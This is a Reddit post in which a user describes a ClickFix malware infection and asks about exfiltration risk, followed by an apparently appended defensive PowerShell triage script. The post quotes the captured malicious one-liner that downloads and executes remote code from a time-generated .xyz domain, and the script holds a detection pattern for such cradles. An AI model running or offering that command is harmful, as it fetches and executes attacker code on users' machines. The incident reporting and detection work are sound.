u/LAINKORNE

Looking for some informed takes on how worried I should actually be.

A few hours ago, my PC had been on for about 40 minutes (just gaming, not browsing) when Defender started firing alerts about a ClickFix around 18h45.

I immediately started a Defender Offline scan, which came back with results but failed to stop the ClickFix alerts, then I launched a full Malwarebytes scan around 19h.

That's when three notable detections came up: a VirTool:Win32/DefenderTamperingRestore flagged as "incomplete repair" targeting HKLM\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware, a Trojan:Win32/ShellCodeRunner.NZL!MTB payload at C:\Users\<me>\AppData\LocalLow\IGDump\X86_03\17774820503.ext, plus the corresponding Trojan:Win32/ClickFix.PJ!MTB and a CoinMiner, all three contained.

Alerts stopped shortly after Malwarebytes took over, though I'm not sure if that's because the threat was actually neutralized or just because Defender went passive once Malwarebytes registered as primary AV.

Multiple subsequent scans (Defender Offline, full Malwarebytes runs, a long ESET online scan) seem to have found and contained the malware and are now coming back clean (Malwarebytes, which I ran first, found a few).

The captured ClickFix command was:

cmd /c powershell.exe irm "$([Math]::Floor([DateTimeOffset]::UtcNow.ToUnixTimeSeconds() / 5000000) * 5000000*2)[.]xyz/script?id=TRMMrwe5Fc&tag=trnt2" | iex

What's confusing me on the vector side: I never manually pasted anything in Win+R or PowerShell, no fake CAPTCHA or fake update prompt, and I wasn't browsing actively at the time. So the execution had to come from somewhere else, maybe a previously downloaded file with delayed trigger, a compromised browser extension running in the background, a scheduled task, something I'm not seeing. (I did a thorough cleanup of my files just in case).

Worth noting: I've seen a couple of other Reddit users report the exact same ClickFix alert at the same timing that day, which makes me think there's some kind of synchronized trigger involved rather than something I might have done at the time it started.

For context on what was potentially exposed, Firefox is my main browser with sessions/cookies/history wiped about 2 weeks before the incident, Bitwarden was locked during the incident with auto-lock enabled, 2FA is set up everywhere by default. Only browser-stored data was payment cards autofill (Firefox doesn't store CVX).

Since the incident I've logged out everywhere, changed critical passwords and audited my account activity.

Planning a full wipe if need be.

How realistic is silent exfiltration given the payload landed on disk before quarantine, but with Bitwarden locked and 2FA everywhere?

Any idea what kind of vector could trigger this without active browsing or manual paste?

On the DefenderTamperingRestore "incomplete repair", my understanding is the targeted DisableAntiSpyware key is effectively neutralized by Tamper Protection on modern Win10/11 regardless of value. Is that right, or does "incomplete" mean something more concerning here?

Is a secure erase + clean Win install enough, or does the privilege escalation attempt warrant a UEFI reflash too?

Thanks in advance for any help

And sorry too, that's a lot of information and questions, but I am losing some sleep over this 🥲

reddit.com
u/LAINKORNE — 15 days ago
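An added host-triage example for the questions in the post above. It is not code from the poster or from any of the replies; it is the kind of check a responder would run on the affected machine. Three things it does: it reproduces the time-based arithmetic from the captured command so you know which domain label to search for in DNS or proxy logs (the value only changes every 5,000,000 seconds, roughly 58 days, so every victim in that window resolved the same name); it reads the Tamper Protection state and the DisableAntiSpyware value the DefenderTamperingRestore alert pointed at; and it hunts the paste-free launch points the poster suspects (scheduled tasks, Run/RunOnce keys, RunMRU, WMI event consumers, PowerShell 4104 script-block events) for an `irm ... | iex` style one-liner. Assumptions: the `$AlertUtc` timestamp is a constructed placeholder to replace with the real alert time, the registry paths are the standard Windows locations, and the script is run from an elevated PowerShell on Windows 10/11 with the Defender module present.

```powershell
# Added triage script (not from the original post). Run elevated on the affected host.
# $AlertUtc is a constructed placeholder: replace it with the real Defender alert time (UTC).
$AlertUtc = [DateTimeOffset]::Parse('2024-01-01T18:45:00Z')

# 1. Reproduce the domain label from the captured command:
#    floor(unix_seconds / 5000000) * 5000000 * 2, then ".xyz".
#    The label is constant for a ~58-day window, so it is the IOC to search in DNS/proxy logs.
$window = 5000000
$label  = [long]([Math]::Floor($AlertUtc.ToUnixTimeSeconds() / $window) * $window * 2)
Write-Host "Domain label to hunt in DNS/proxy logs for this window: $label.xyz"

# 2. Tamper Protection state and the DisableAntiSpyware value the alert referenced.
$mp = Get-MpComputerStatus
Write-Host ("Tamper Protection: {0}  Real-time protection: {1}  AM service: {2}" -f `
    $mp.IsTamperProtected, $mp.RealTimeProtectionEnabled, $mp.AMServiceEnabled)
$dasKey = 'HKLM:\SOFTWARE\Microsoft\Windows Defender'
$das = (Get-ItemProperty -Path $dasKey -Name DisableAntiSpyware -ErrorAction SilentlyContinue).DisableAntiSpyware
Write-Host "DisableAntiSpyware value: $(if ($null -eq $das) { '<absent>' } else { $das })"

# 3. Hunt persistence that can launch a command with no Win+R paste.
#    Pattern covers download-and-run cradles and encoded commands; tune as needed.
$pattern = 'irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|Invoke-Expression|\biex\b|-enc'
$hits = @()

# Scheduled tasks: inspect every action's executable and arguments.
foreach ($t in Get-ScheduledTask) {
    foreach ($a in $t.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($cmd -match $pattern) {
            $hits += [pscustomobject]@{ Source = "Task $($t.TaskPath)$($t.TaskName)"; Command = $cmd }
        }
    }
}

# Run / RunOnce keys in both hives, plus RunMRU (the Win+R history, which a
# real paste would have left an entry in).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
)
foreach ($k in $runKeys) {
    $p = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
    if (-not $p) { continue }
    foreach ($prop in $p.PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }   # skip PowerShell provider metadata
        if ("$($prop.Value)" -match $pattern) {
            $hits += [pscustomobject]@{ Source = "$k\$($prop.Name)"; Command = $prop.Value }
        }
    }
}

# WMI permanent event subscriptions: a CommandLineEventConsumer fires on a
# timer or system event with no user interaction at all.
Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
    ForEach-Object {
        if ("$($_.CommandLineTemplate)" -match $pattern) {
            $hits += [pscustomobject]@{ Source = "WMI consumer $($_.Name)"; Command = $_.CommandLineTemplate }
        }
    }

# Script block logging (event 4104) around the alert time, if it was enabled.
# This can still show the one-liner after the persistence entry itself was removed.
$start = $AlertUtc.AddMinutes(-60).LocalDateTime
$end   = $AlertUtc.AddMinutes(30).LocalDateTime
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $start; EndTime = $end } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match $pattern } |
    ForEach-Object {
        $hits += [pscustomobject]@{ Source = "Event 4104 $($_.TimeCreated)"; Command = ($_.Message -split "`n")[0] }
    }

if ($hits) { $hits | Format-Table -AutoSize -Wrap }
else { Write-Host 'No irm/iex style launcher found in tasks, Run keys, RunMRU, WMI consumers or 4104 events.' }
```

Two reading notes. If RunMRU has no entry matching the cradle, that supports the poster's statement that nothing was pasted into Win+R; a scheduled task, Run key or WMI consumer hit would be the delayed trigger being looked for. On the tamper question, the script shows both the `IsTamperProtected` flag and the raw registry value side by side, which is the evidence to decide whether the write the alert flagged was actually honoured by the engine rather than guessing from the word "incomplete".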